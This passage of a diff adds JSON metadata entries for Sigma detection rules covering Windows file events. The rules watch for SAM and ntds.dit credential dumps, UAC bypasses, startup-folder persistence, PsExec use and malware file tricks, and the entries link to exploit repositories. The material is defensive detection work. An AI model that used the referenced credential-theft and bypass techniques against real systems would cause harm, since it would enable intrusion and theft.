"file_event_win_sam_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/search?q=CVE-2021-36934", + "https://github.com/cube0x0/CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", + "https://github.com/HuskyHacks/ShadowSteal", + "https://github.com/FireFart/hivenightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", + "value": "SAM Dump File Creation" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_screenconnect_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_screenconnect_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", + "value": "ScreenConnect Temporary Installation Artefact" + }, + { + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.execution" + ] + }, + "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "value": "Created Files by Office Applications" + }, + { + "description": "Detects a Windows executable that writes files to suspicious folders", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/20", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_shell_write_susp_directory.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" + ], + "tags": "No established tags" + }, + "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "value": "Windows Shell File Write to Suspicious Folder" + }, + { + "description": "Detects windows executables that writes files with suspicious extensions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_shell_write_susp_files_extensions.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" + ], + "tags": "No established tags" + }, + "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "value": "Windows Binaries Write Suspicious Extensions" + }, + { + "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + ], + "filename": "file_event_win_startup_folder_file_write.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/12", + "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75", + "value": "Startup Folder File Write" + }, + { + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "meta": { + "author": "xknow @xknow_infosec, Tim Shelton", + "creation_date": "2019/03/24", + "falsepositive": [ + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + ], + "filename": "file_event_win_susp_adsi_cache_usage.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/fox-it/LDAPFragger", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" + ], + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ] + }, + "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "value": "Suspicious ADSI-Cache Usage By Unknown Tool" + }, + { + "description": "Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.", + "meta": { + "author": "omkar72, oscd.community, Wojciech Lesicki", + "creation_date": "2020/10/12", + "falsepositive": [ + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + ], + "filename": "file_event_win_susp_clr_logs.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1218" + ] + }, + "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263", + "value": "Suspicious CLR Logs Creation" + }, + { + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "meta": { + "author": "frack113", + "creation_date": "2022/01/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_colorcpl.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/eral4m/status/1480468728324231172?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "value": "Suspicious Creation with Colorcpl" + }, + { + "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", + "meta": { + "author": "elhoim", + "creation_date": "2022/04/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_creation_by_mobsync.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml" + ], + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "409f8a98-4496-4aaa-818a-c931c0a8b832", + "value": "Created Files by Microsoft Sync Center" + }, + { + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "meta": { + "author": "elhoim", + "creation_date": "2022/04/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_default_gpo_dir_write.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml" + ], + "tags": [ + "attack.t1036.005", + "attack.defense_evasion" + ] + }, + "uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", + "value": "Suspicious Files in Default GPO Folder" + }, + { + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "file_event_win_susp_desktopimgdownldr_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1105" + ] + }, + "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "value": "Suspicious Desktopimgdownldr Target File" + }, + { + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "creation_date": "2020/03/19", + "falsepositive": [ + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" + ], + "filename": "file_event_win_susp_desktop_ini.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "81315b50-6b60-4d8f-9928-3466e1022515", + "value": "Suspicious desktop.ini Action" + }, + { + "description": "Ransomware create txt file in the user Desktop", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_desktop_txt.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "value": "Suspicious Creation TXT File in User Desktop" + }, + { + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "meta": { + "author": "frack113", + "creation_date": "2022/06/08", + "falsepositive": [ + "Legitimate microsoft diagcab" + ], + "filename": "file_event_win_susp_diagcab.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://threadreaderapp.com/thread/1533879688141086720.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml" + ], + "tags": [ + "attack.resource_development" + ] + }, + "uuid": "3d0ed417-3d94-4963-a562-4a92c940656a", + "value": "Creation of a Diagcab" + }, + { + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "meta": { + "author": "Nasreddine Bencherchali, frack113", + "creation_date": "2022/06/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_susp_double_extension.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ] + }, + "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "value": "Suspicious Double Extension Files" + }, + { + "description": "Detects the creation of an executable by another executable", + "meta": { + "author": "frack113", + "creation_date": "2022/03/09", + "falsepositive": [ + "Software installers", + "Update utilities" + ], + "filename": "file_event_win_susp_dropper.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Malware Sandbox", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dropper.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "297afac9-5d02-4138-8c58-b977bac60556", + "value": "Creation of an Executable by an Executable" + }, + { + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_exchange_aspx_write.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "value": "Suspicious MSExchangeMailboxReplication ASPX Write" + }, + { + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "meta": { + "author": "frack113", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_executable_creation.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", + "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "74babdd6-a758-4549-9632-26535279e654", + "value": "Suspicious Executable File Creation" + }, + { + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/04/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_get_variable.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://www.joesandbox.com/analysis/465533/0/html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "value": "Suspicious Get-Variable.exe Creation" + }, + { + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "meta": { + "author": "Nasreddine Bencherchali, frack113", + "creation_date": "2022/11/07", + "falsepositive": [ + "Users creating a shortcut on e.g. desktop" + ], + "filename": "file_event_win_susp_lnk_double_extension.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ] + }, + "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", + "value": "Suspicious LNK Double Extension Files" + }, + { + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_ntds_dit.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", + "https://adsecurity.org/?p=2398", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" + ] + }, + "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", + "value": "Suspicious Process Writes Ntds.dit" + }, + { + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "System administrators managing certififcates." + ], + "filename": "file_event_win_susp_pfx_file_creation.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/14", + "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "value": "Suspicious PFX File Creation" + }, + { + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "meta": { + "author": "HieuTT35, Nasreddine Bencherchali", + "creation_date": "2019/10/24", + "falsepositive": [ + "System administrator create Powershell profile manually" + ], + "filename": "file_event_win_susp_powershell_profile.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://persistence-info.github.io/Data/powershellprofile.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" + ] + }, + "uuid": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "value": "PowerShell Profile Modification" + }, + { + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." + ], + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + ], + "tags": [ + "attack.t1562.001", + "attack.defense_evasion" + ] + }, + "uuid": "3da70954-0f2c-4103-adff-b7440368f50e", + "value": "Suspicious PROCEXP152.sys File Created In TMP" + }, + { + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_spool_drivers_color_drop.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "value": "Drop Binaries Into Spool Drivers Color Folder" + }, + { + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Rare legitimate usage of some of the extensions mentioned in the rule" + ], + "filename": "file_event_win_susp_startup_folder_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "value": "Suspicious Startup Folder Persistence" + }, + { + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/07", + "falsepositive": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" + ], + "tags": "No established tags" + }, + "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "value": "Suspicious Interactive PowerShell as SYSTEM" + }, + { + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_task_write.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.t1053" + ] + }, + "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "value": "Suspicious Scheduled Task Write to System32 Tasks" + }, + { + "description": "Detects the creation of log files during a TeamViewer remote session", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/30", + "falsepositive": [ + "Legitimate uses of TeamViewer in an organisation" + ], + "filename": "file_event_win_susp_teamviewer_remote_session.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.teamviewer.com/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", + "value": "TeamViewer Remote Session" + }, + { + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Legitimate use of the profile by developers or administrators" + ], + "filename": "file_event_win_susp_vscode_powershell_profile.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" + ] + }, + "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", + "value": "VsCode Powershell Profile Modification" + }, + { + "description": "Detects the creation of an file in user Word Startup", + "meta": { + "author": "frack113", + "creation_date": "2022/06/05", + "falsepositive": [ + "Addition of legitimate plugins" + ], + "filename": "file_event_win_susp_winword_startup.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", + "value": "Creation In User Word Startup Folder" + }, + { + "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_tool_psexec.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", + "value": "PsExec Service File Creation" + }, + { + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_tsclient_filewrite_startup.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", + "value": "Hijack Legit RDP Session to Move Laterally" + }, + { + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_consent_comctl32.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "value": "UAC Bypass Using Consent and Comctl32 - File" + }, + { + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "value": "UAC Bypass Using .NET Code Profiler on MMC" + }, + { + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "meta": { + "author": "Antonio Cocomazzi (idea), Florian Roth (rule)", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_eventvwr.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", + "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ] + }, + "uuid": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", + "value": "UAC Bypass Using 